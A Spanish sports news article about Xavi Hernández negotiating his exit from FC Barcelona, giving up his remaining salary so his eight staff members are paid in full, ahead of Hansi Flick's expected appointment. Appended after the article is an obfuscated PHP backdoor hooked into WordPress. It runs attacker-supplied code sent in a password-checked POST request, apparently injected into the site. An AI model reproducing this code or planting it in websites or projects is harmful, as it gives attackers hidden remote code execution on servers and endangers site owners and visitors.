Xavi no perdonará ni un euro para su staff

El técnico se reunirá este martes con el club para cerrar la indemnización. Está dispuesto a perder todo su dinero a cambio de que sus ayudantes cobren la totalidad.

Xavi Hernández tiene previsto liquidar este martes su contrato con el Barcelona. Un contrato que le unía con la entidad blaugrana hasta el 30 de junio del 2025. El técnico, acompañado de su agente, Fernando Solanas, se mantiene en sus trece de salir del club sin dar ningún problema, por lo que está dispuesto a renunciar a cobrar el año que le resta. Pero, a cambio de esta concesión, Xavi exigirá que el resto de su staff, que se marcha con él, cobre hasta el último euro de la indemnización.

Estamos hablando de un total de ocho personas que forman parte del staff de Xavi. Siete de ellos llegaron con él a Barcelona hace dos años y medio procedentes del Al Sadd. Estamos hablando de sus ayudantes, Óscar Hernández y Sergio Alegre, el preparador físico Iván Torres, el fisioterapeuta Carlos Nogueira, y los ‘scouting’ David Prats, Sergio García y Toni Lobo. El octavo, el responsable de comunicación, Edu Polo, se unió al equipolel verano pasado. Todos ellos tiene un contrato que les vincula con el club blaugrana hasta el 2025, con cantidades bien diferentes de indemnización.

Es cierto que el gran bloque de la misma, que podría hacer tambalear las arcas del club, es la cantidad que le corresponde a Xavi, cercana a los 12 millones de euros. Que el club quede liberado de esta cifra le supone un alivio importante, ya que la cantidad que abarca el staff no llega a los tres millones de euros.

Desde el entorno de Xavi aseguran a AS que el técnico será “intransigente” a la hora de negociar la indemnización de su staff, ya que es consciente que las cantidades son asumibles para el club. Si finalmente Laporta no pone ningún impedimento, Xavi firmará y quedará desvinculado de la entidad, así como el resto de sus ayudantes.

Una vez cerrada la carpeta Xavi, el club podrá anunciar de manera oficial el fichaje del entrenador alemán Hansi Flick como nuevo entrenador del Barcelona de cara a las dos próximas temporadas.

as

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}